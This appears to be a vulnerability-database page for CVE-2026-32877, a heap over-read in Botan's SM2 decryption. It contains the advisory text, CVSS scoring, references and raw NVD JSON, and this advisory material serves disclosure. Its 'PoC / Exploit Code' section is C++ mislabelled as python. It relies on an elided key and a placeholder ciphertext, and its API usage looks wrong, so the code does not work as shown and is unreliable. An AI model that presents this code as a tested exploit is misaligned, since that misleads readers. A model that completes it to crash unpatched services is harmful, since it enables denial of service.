CVE-2026-32877

Description

Botan is a C++ cryptography library. From version 2.3.0 to before version 3.11.0, during SM2 decryption, the code that checked the authentication code value (C3) failed to check that the encoded value was of the expected length prior to comparison. An invalid ciphertext can cause a heap over-read of up to 31 bytes, resulting in a crash or potentially other undefined behavior. This issue has been patched in version 3.11.0.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:botan_project:botan:*:*:*:*:*:*:*:* - VULNERABLE

Botan >= 2.3.0, < 3.11.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <botan/auto_rng.h>
#include <botan/pubkey.h>
#include <botan/sm2.h>
#include <botan/hex.h>
#include <vector>
#include <iostream>

// PoC for CVE-2026-32877: Botan SM2 Decryption Heap Over-read
// This code attempts to decrypt a malformed ciphertext to trigger the vulnerability.

int main() {
    try {
        // Setup a valid SM2 private key (simplified for PoC context)
        // In a real scenario, this would be loaded from a PEM file
        std::string priv_key_pem = "-----BEGIN PRIVATE KEY-----\n...\n-----END PRIVATE KEY-----";
        Botan::DataSource_Memory key_datasource(priv_key_pem);
        std::unique_ptr<Botan::Private_Key> key(Botan::PKCS8::load_key(key_datasource));

        // Malformed ciphertext designed to trigger the C3 length check failure
        // The payload must be crafted to bypass initial checks but have an invalid C3 length
        // Example structure: C1 || Invalid C3 (too short/long) || C2
        std::vector<uint8_t> malformed_ct = Botan::hex_decode("EXAMPLE_MALFORMED_HEX_STRING_HERE");

        Botan::PK_Decryptor_EME decryptor(*key, Botan::system_rng(), "Raw");

        // Trigger the heap over-read during decryption
        // This may cause a crash (Segfault) or undefined behavior
        Botan::secure_vector<uint8_t> decrypted = decryptor.decrypt(malformed_ct);

    } catch (std::exception& e) {
        std::cout << "Exception caught: " << e.what() << std::endl;
        // A crash indicates the vulnerability is triggered
    }
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32877
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32877
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32877/
[4] VulDB https://vuldb.com/cve/CVE-2026-32877
[5] https://github.com/randombit/botan/security/advisories/GHSA-7jj6-4r42-w9h6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32877", "sourceIdentifier": "[email protected]", "published": "2026-03-30T21:17:09.767", "lastModified": "2026-04-13T13:57:30.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Botan is a C++ cryptography library. From version 2.3.0 to before version 3.11.0, during SM2 decryption, the code that checked the authentication code value (C3) failed to check that the encoded value was of the expected length prior to comparison. An invalid ciphertext can cause a heap over-read of up to 31 bytes, resulting in a crash or potentially other undefined behavior. This issue has been patched in version 3.11.0."}, {"lang": "es", "value": "Botan es una biblioteca de criptografía C++. Desde la versión 2.3.0 hasta antes de la versión 3.11.0, durante el descifrado SM2, el código que verificaba el valor del código de autenticación (C3) no verificó que el valor codificado tuviera la longitud esperada antes de la comparación. Un texto cifrado no válido puede causar una lectura excesiva de la pila (heap over-read) de hasta 31 bytes, lo que resulta en un fallo o potencialmente en otro comportamiento indefinido. Este problema ha sido parcheado en la versión 3.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:botan_project:botan:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.0", "versionEndExcluding": "3.11.0", "matchCriteriaId": "3275D95B-2891-4D86-B9D3-E642CFDDEED0"}]}]}], "references": [{"url": "https://github.com/randombit/botan/security/advisories/GHSA-7jj6-4r42-w9h6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}